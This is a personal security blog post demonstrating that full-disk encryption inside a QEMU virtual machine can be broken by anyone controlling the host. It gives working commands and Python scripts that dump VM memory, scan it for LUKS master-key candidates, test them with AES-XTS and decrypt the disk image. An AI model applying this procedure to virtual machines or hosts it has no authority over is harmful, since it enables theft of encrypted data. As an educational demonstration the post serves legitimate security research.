Max Duijsens
About computer security and other hobbies

Breaking VM Full-Disk Encryption

I used to rent multiple VPS’s on which I host various services like for example this blog. Whenever I don’t have access to a console session on the VPS, I tend to only create an encrypted container and install all config files in there. However, on some VPS’s I have console access, so it is much more convenient to use full-disk encryption. However using full-disk encryption in a Virtual Machine is of course completely broken if you cannot trust the hypervisor. At least that’s what I learned in school. Curious as we are, let’s see if we can break the encryption of a VM running in a quemu virtualisation software on my own host.

Step 1: Get the encrypted data

I’m running my VM on a linux host, so I’ll use gdb with gcore to make a memory dump. First you figure out which PID your target VM is using, then you enter the following command:

$ gcore -o quemu.bin <pid>

This will give you a binary file quemu.bin which contains the memory of your VM (actually all memory it is using on the host so this might also include some additional stuff. I’m not a virtualisation professional so let’s leave that to those guys).

Now the master key should be somewhere in quemu.bin since that file contains the RAM of the VM.

Step 2: Get the actual data

Just go to the folder where the disk image is located and copy the image to another folder. This image has an encrypted partition on it which we want to decrypt, but it also includes a partition table and a LUKS header for example which we need to strip off in order to be able to easily decrypt it later on.

Here is a python script which strips off the partition table and LUKS header from a quemu image:

import subprocess
import sys
import re

if len(sys.argv) < 3:
    sys.stderr.write("Usage: convert.py input.img encrypted.img\n")
    sys.exit(1)

inputFilename = sys.argv[1]
outputFilename = sys.argv[2]

fdisk = subprocess.check_output(["/sbin/fdisk", "-l", inputFilename])
matcher = r"^"+re.escape(inputFilename)+r'5\s+(\d+)'
luksOffset = int(re.search(matcher, fdisk,re.MULTILINE).group(1))
payloadOffset = luksOffset + 4096 # 4096*512=2MB
subprocess.call(["dd", "if="+inputFilename, "of="+outputFilename,
                 "skip="+repr(payloadOffset),
                 "bs=512"])

encrypted.img will now contain only the encrypted data contained in the input.img disk image.

Step 3: Get the keys

One option to get the key is just trying every 64byte block from the quemu core dump and try to decrypt the encrypted.img. However, this will run a lot of AES operations which take a long time. There are a few ways to make it faster:

  1. The encryption key is probably aligned to a 4byte boundary in RAM.
  2. The key likely does not have more than a few repeating characters. Neither will it contain many consecutive null-bytes (0x00).
  3. You can decrypt the first 16 bytes of the image. These 16 bytes contain zeroes when decrypted, so when you decrypt the first 16 bytes with a key, you can test whether the key is likely to be correct if the first 16 bytes of the output are zeroes.

Here is a script that dumps all key candidates. You need pyelftools installed (apt-get install python-pyelftools).

import sys
from elftools.elf.elffile import ELFFile
import binascii

# All we do here is grab each LOAD segment of the core file, then starting
# at a zero offset, we keep upping the offset by 4 bytes at a time and dumping
# out a candidate key.
def dump_block(segment):
    global candidateCount
    data = segment.data()
    l = len(data)
    keySize = 64
    for start in xrange(0, l-(keySize-4), 4):
        end=start+keySize
        key = data[start:end]
        all_same = key[0:-1] == key[1:]
        if all_same or ('\0\0\0\0' in key):
            next
        else:
            print binascii.hexlify(key)

coreFilename = sys.argv[1]

with open(coreFilename, "rb") as fd:
    elffile = ELFFile(fd)
    for i in xrange(elffile.num_segments()):
        segment = elffile.get_segment(i)
        header = segment.header
        if header.p_type == 'PT_NOTE':
            next
        elif header.p_type == 'PT_LOAD':
            if header.p_filesz > 0:
                dump_block(segment)

This script will print out all possible keys to stdout, so you can pipe it to a file. It will run a while since it needs to perform quite a few AES operations. However, AES is designed to be fast so it should not take more than a few minutes.

Now, we need to find the correct key amongst the key candidates. Here is a script that goes through all key candidates pasted on stdin and exits when it decrypts the first 16 bytes as zeroes. Be advised it requires CryptoPlus installed, you cannot install it via pip so you have to install it manually. It depends on pycrypto which I would advise you to install the latest version from source as well as Debian contains old versions in the package manager.

import sys
from CryptoPlus.Cipher import python_AES

class Locksmith(object):

    sentinel = '\0'*16

    def __init__(self, inputFilename):
        # read the first 16 bytes of encrypted data.  That's one AES
        # block.
        with open(inputFilename, "rb") as fd:
            self.ciphertext = fd.read(16)

    def tryDecode(self,trialKeyHex):
        trialKey = trialKeyHex.decode("hex")
        # Hardcode the key length; assume we're only going to get
        # 512-bit master keys because that's the Debian default.
        key1 = trialKey[0:32]
        key2 = trialKey[32:]
        # Thank you, CryptoPlus!
        decipher = python_AES.new((key1,key2), python_AES.MODE_XTS)
        maybePlaintext = decipher.decrypt(self.ciphertext)
        return self._foundSentinel(maybePlaintext)

    def _foundSentinel(self, maybePlaintext):
        return maybePlaintext == self.sentinel


inputfilename=sys.argv[1]

ls = Locksmith(inputfilename)
for line in iter(sys.stdin):
    maybeKey = line.strip()
    if len(maybeKey) == 128:
        if ls.tryDecode(line.strip()):
            print line
            sys.exit(0)
sys.exit(1)

It will print a “correct” key to stdout.

Step 4: Decrypt the image

Now that we have the key and the data, we can decrypt the disk image. This will take a while but is a straightforward AES operation:

import sys
import struct
from CryptoPlus.Cipher import python_AES

inputFilename = sys.argv[1]
outputFilename = sys.argv[2]

key = sys.stdin.readline().strip().decode("hex")
key1 = key[0:32]
key2 = key[32:]
decipher = python_AES.new((key1, key2), python_AES.MODE_XTS)
with open(inputFilename, "rb") as inputFile:
    with open(outputFilename, "wb") as outputFile:
        done = False
        sectorNum = 0
        while not done:
            cipherText = inputFile.read(512)
            if cipherText != None and len(cipherText) > 0:
                plainText = decipher.decrypt(cipherText,struct.pack("<Q", sectorNum))
                outputFile.write(plainText)
                sectorNum = sectorNum + 1
            else: done = True

This script will take a while since it is very computationally expensive. On my MacBook it took about 5 hours to decrypt a 5GB disk image. When the output is generated, this is a LUKS PV image not an actual disk image. Your OS won’t understand how to use it. It’s possible to strip off the LUKS PV header (which is 1MB in size by default) like so:

$ dd if=decrypted.img of=ext4.img bs=1M skip=1

Now you can mount the ext4.img to get access to the VM’s virtual disk contents.

Conclusion: full disk encryption on a VM is useless if you cannot trust the host. A much better option is to control the host yourself and do full disk encryption on the host. This makes it much harder for forensics experts to decrypt the contents of the disk.